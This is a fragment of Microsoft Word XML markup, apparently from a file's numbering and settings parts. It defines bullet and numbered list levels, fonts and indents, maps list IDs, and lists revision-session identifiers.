      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7473"/>
        </w:tabs>
        <w:ind w:left="7473" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000050"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000050"/>
    <w:name w:val="WW8Num80"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1800"/>
        </w:tabs>
        <w:ind w:left="1800" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000052"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000052"/>
    <w:name w:val="WW8Num82"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="216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53"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000053"/>
    <w:name w:val="WW8Num83"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000055"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00000055"/>
    <w:name w:val="WW8Num85"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◊"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4380"/>
        </w:tabs>
        <w:ind w:left="4380" w:hanging="340"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:color w:val="auto"/>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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00000058"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00000058"/>
    <w:name w:val="WW8Num88"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000005B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0000005B"/>
    <w:name w:val="WW8Num91"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3240"/>
        </w:tabs>
        <w:ind w:left="3240" w:hanging="374"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2520"/>
        </w:tabs>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3254"/>
        </w:tabs>
        <w:ind w:left="3254" w:hanging="374"/>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cs="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cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="7560"/>
        </w:tabs>
        <w:ind w:left="7560" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0000005D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0000005D"/>
    <w:name w:val="WW8Num93"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="00DD5FD6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00DD5FD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32B4131"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032B4131"/>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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="034B741D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="034B741D"/>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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0B7E0643"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B7E064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0CD045F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CD045F3"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10763D9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10763D9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39979BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="139979B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45B0A4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="145B0A4F"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="-6-"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="227" w:hanging="227"/>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8024D03"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18024D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36049C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="236049C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3D84588"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23D84588"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26E83DF1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26E83DF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B4F764C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3B4F764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BD4044C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BD4044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3BEB6FC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BEB6FC6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3D8D0BCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D8D0BCE"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="576" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="3"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1571" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:caps w:val="0"/>
        <w:smallCaps w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:vanish w:val="0"/>
        <w:color w:val="000000"/>
        <w:spacing w:val="0"/>
        <w:position w:val="0"/>
        <w:u w:val="none"/>
        <w:vertAlign w:val="baseline"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="%1.%2.%3.%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="864" w:hanging="864"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:b w:val="0"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="406B7FE8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="406B7FE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6446A78"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="46446A7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C05332E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C05332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501459AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="501459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A2910B2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2910B2"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="36" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A291387"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A291387"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="37" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2DFB83"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2DFB83"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="38" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A2E004A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A2E004A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="425"/>
        </w:tabs>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="39" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A7174E5"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A7174E5"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="40" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A717A50"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5A717A50"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5B5355F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B5355F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D166834"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5D1668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E5A670A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5E5A670A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="44" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E826B4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E8D829D0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-1"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>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
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-GB"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-3"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="8lab-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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="67FB4F8B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="67FB4F8B"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68BA003C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68BA003C"/>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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A994295"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A994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6CEE3A37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CEE3A37"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="74F06206"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F06206"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="-8-"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="Fig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7DB13D5E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DB13D5E"/>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44"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="36">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proofState w:grammar="clean"/>
  <w:stylePaneSortMethod w:val="0002"/>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59A"/>
    <w:rsid w:val="00003A9D"/>
    <w:rsid w:val="00016976"/>
    <w:rsid w:val="00031D9E"/>
    <w:rsid w:val="00040216"/>
    <w:rsid w:val="00040523"/>
    <w:rsid w:val="00041F2A"/>
    <w:rsid w:val="00051846"/>
    <w:rsid w:val="00063D9B"/>
    <w:rsid w:val="00072E09"/>
    <w:rsid w:val="00073F8D"/>
    <w:rsid w:val="000812A7"/>
    <w:rsid w:val="00084C3A"/>
    <w:rsid w:val="0009388D"/>
    <w:rsid w:val="000A04E4"/>
    <w:rsid w:val="000B5C8E"/>
    <w:rsid w:val="000C41FD"/>
    <w:rsid w:val="000E4336"/>
    <w:rsid w:val="000E536A"/>
    <w:rsid w:val="000E682D"/>
    <w:rsid w:val="000F4C16"/>
    <w:rsid w:val="000F6021"/>
    <w:rsid w:val="000F77D2"/>
    <w:rsid w:val="001020CF"/>
    <w:rsid w:val="0010334F"/>
    <w:rsid w:val="001054AA"/>
    <w:rsid w:val="001106A5"/>
    <w:rsid w:val="0011795E"/>
    <w:rsid w:val="00126143"/>
    <w:rsid w:val="0012768B"/>
    <w:rsid w:val="00132147"/>
    <w:rsid w:val="00142CD1"/>
    <w:rsid w:val="00144FAA"/>
    <w:rsid w:val="00153CC9"/>
    <w:rsid w:val="001636DA"/>
    <w:rsid w:val="001665BF"/>
    <w:rsid w:val="001706AC"/>
    <w:rsid w:val="00182551"/>
    <w:rsid w:val="0018710C"/>
    <w:rsid w:val="00193C28"/>
    <w:rsid w:val="001966BB"/>
    <w:rsid w:val="001A7D38"/>
    <w:rsid w:val="001B221C"/>
    <w:rsid w:val="001B7460"/>
    <w:rsid w:val="001B7841"/>
    <w:rsid w:val="001E5669"/>
    <w:rsid w:val="001F0910"/>
    <w:rsid w:val="001F782D"/>
    <w:rsid w:val="002271CE"/>
    <w:rsid w:val="002272C6"/>
    <w:rsid w:val="00232D1A"/>
    <w:rsid w:val="00234241"/>
    <w:rsid w:val="0025259A"/>
    <w:rsid w:val="0026502B"/>
    <w:rsid w:val="00271A69"/>
    <w:rsid w:val="00287768"/>
    <w:rsid w:val="002917CD"/>
    <w:rsid w:val="00293452"/>
    <w:rsid w:val="00295309"/>
    <w:rsid w:val="00295BE6"/>
    <w:rsid w:val="00296D58"/>
    <w:rsid w:val="002A0233"/>
    <w:rsid w:val="002A4393"/>
    <w:rsid w:val="002B727C"/>
    <w:rsid w:val="002C4F82"/>
    <w:rsid w:val="002E5AC5"/>
    <w:rsid w:val="002F26E3"/>
    <w:rsid w:val="002F74AE"/>
    <w:rsid w:val="00304677"/>
    <w:rsid w:val="00316959"/>
    <w:rsid w:val="00342DFA"/>
    <w:rsid w:val="00342E71"/>
    <w:rsid w:val="00356970"/>
    <w:rsid w:val="00366666"/>
    <w:rsid w:val="0037026F"/>
    <w:rsid w:val="003826BC"/>
    <w:rsid w:val="003A2163"/>
    <w:rsid w:val="003A5FD6"/>
    <w:rsid w:val="003B0746"/>
    <w:rsid w:val="003C3F40"/>
    <w:rsid w:val="003D72D7"/>
    <w:rsid w:val="00402093"/>
    <w:rsid w:val="00402C2E"/>
    <w:rsid w:val="00403B6D"/>
    <w:rsid w:val="00406F7D"/>
    <w:rsid w:val="00407BFF"/>
    <w:rsid w:val="00432778"/>
    <w:rsid w:val="004335AD"/>
    <w:rsid w:val="00434778"/>
    <w:rsid w:val="00457B5F"/>
    <w:rsid w:val="0046097B"/>
    <w:rsid w:val="004615D9"/>
    <w:rsid w:val="0047730B"/>
    <w:rsid w:val="00491BB5"/>
    <w:rsid w:val="00497F5F"/>
    <w:rsid w:val="004B2B84"/>
    <w:rsid w:val="004B2B8B"/>
    <w:rsid w:val="004C737A"/>
    <w:rsid w:val="004D362F"/>
    <w:rsid w:val="004E2ED5"/>
    <w:rsid w:val="004E57C9"/>
    <w:rsid w:val="00501406"/>
    <w:rsid w:val="00501AE9"/>
    <w:rsid w:val="00504932"/>
    <w:rsid w:val="00543E4A"/>
    <w:rsid w:val="00547F8D"/>
    <w:rsid w:val="00551FA4"/>
    <w:rsid w:val="0055239D"/>
    <w:rsid w:val="00554415"/>
    <w:rsid w:val="00556822"/>
    <w:rsid w:val="0056057A"/>
    <w:rsid w:val="00570215"/>
    <w:rsid w:val="00572CC1"/>
    <w:rsid w:val="00583D84"/>
    <w:rsid w:val="00585EE6"/>
    <w:rsid w:val="005903CF"/>
    <w:rsid w:val="0059179A"/>
    <w:rsid w:val="005A5902"/>
    <w:rsid w:val="005C2AA7"/>
    <w:rsid w:val="005C2FBD"/>
    <w:rsid w:val="005C4BD7"/>
    <w:rsid w:val="005D20C6"/>
    <w:rsid w:val="005D7750"/>
    <w:rsid w:val="005E20A0"/>
    <w:rsid w:val="005E3F43"/>
    <w:rsid w:val="00601106"/>
    <w:rsid w:val="00601159"/>
    <w:rsid w:val="006011F7"/>
    <w:rsid w:val="00625ADD"/>
    <w:rsid w:val="00627AA6"/>
    <w:rsid w:val="00632D01"/>
    <w:rsid w:val="00637DED"/>
    <w:rsid w:val="00665EFC"/>
    <w:rsid w:val="00673CCA"/>
    <w:rsid w:val="00683512"/>
    <w:rsid w:val="00685469"/>
    <w:rsid w:val="00687FC9"/>
    <w:rsid w:val="006931A1"/>
    <w:rsid w:val="00695D1B"/>
    <w:rsid w:val="006A46C8"/>
    <w:rsid w:val="006A621F"/>
    <w:rsid w:val="006A7CAB"/>
    <w:rsid w:val="006B397D"/>
    <w:rsid w:val="006C3FBD"/>
    <w:rsid w:val="006C6AD4"/>
    <w:rsid w:val="006D1FE0"/>
    <w:rsid w:val="006D7B59"/>
    <w:rsid w:val="006E2E08"/>
    <w:rsid w:val="006E723F"/>
    <w:rsid w:val="006E7844"/>
    <w:rsid w:val="006F3F3E"/>
    <w:rsid w:val="00706792"/>
    <w:rsid w:val="00720B63"/>
    <w:rsid w:val="0072407C"/>
    <w:rsid w:val="00751612"/>
    <w:rsid w:val="00752A7D"/>
    <w:rsid w:val="007658FF"/>
    <w:rsid w:val="00766FD0"/>
    <w:rsid w:val="0077034A"/>
    <w:rsid w:val="0077115E"/>
    <w:rsid w:val="0077149A"/>
    <w:rsid w:val="007A6E9A"/>
    <w:rsid w:val="007B11F5"/>
    <w:rsid w:val="008040BD"/>
    <w:rsid w:val="00812BB1"/>
    <w:rsid w:val="00823B98"/>
    <w:rsid w:val="008252F3"/>
    <w:rsid w:val="00833C0D"/>
    <w:rsid w:val="00845D1D"/>
    <w:rsid w:val="00845D95"/>
    <w:rsid w:val="00857B72"/>
    <w:rsid w:val="00864BA4"/>
    <w:rsid w:val="008657B1"/>
    <w:rsid w:val="008803E2"/>
    <w:rsid w:val="0088049E"/>
    <w:rsid w:val="0088118F"/>
    <w:rsid w:val="00893EE7"/>
    <w:rsid w:val="00895A44"/>
    <w:rsid w:val="008C2EDA"/>
    <w:rsid w:val="008D5C33"/>
    <w:rsid w:val="008F13CD"/>
    <w:rsid w:val="008F1644"/>
    <w:rsid w:val="008F1CAC"/>
    <w:rsid w:val="00914C45"/>
    <w:rsid w:val="00917639"/>
    <w:rsid w:val="00942D38"/>
    <w:rsid w:val="009446E6"/>
    <w:rsid w:val="009463DF"/>
    <w:rsid w:val="00952DD1"/>
    <w:rsid w:val="00985B98"/>
    <w:rsid w:val="009B229F"/>
    <w:rsid w:val="009B4CE4"/>
    <w:rsid w:val="009B6623"/>
    <w:rsid w:val="009B7005"/>
    <w:rsid w:val="009C1377"/>
    <w:rsid w:val="009C1E94"/>
    <w:rsid w:val="009C5828"/>
    <w:rsid w:val="009E010D"/>
    <w:rsid w:val="009E30AC"/>
    <w:rsid w:val="00A02C45"/>
    <w:rsid w:val="00A1088D"/>
    <w:rsid w:val="00A16E5B"/>
    <w:rsid w:val="00A25348"/>
    <w:rsid w:val="00A317BF"/>
    <w:rsid w:val="00A34A99"/>
    <w:rsid w:val="00A434D4"/>
    <w:rsid w:val="00A50915"/>
    <w:rsid w:val="00A54115"/>
    <w:rsid w:val="00A5661A"/>
    <w:rsid w:val="00A67C10"/>
    <w:rsid w:val="00A912E4"/>
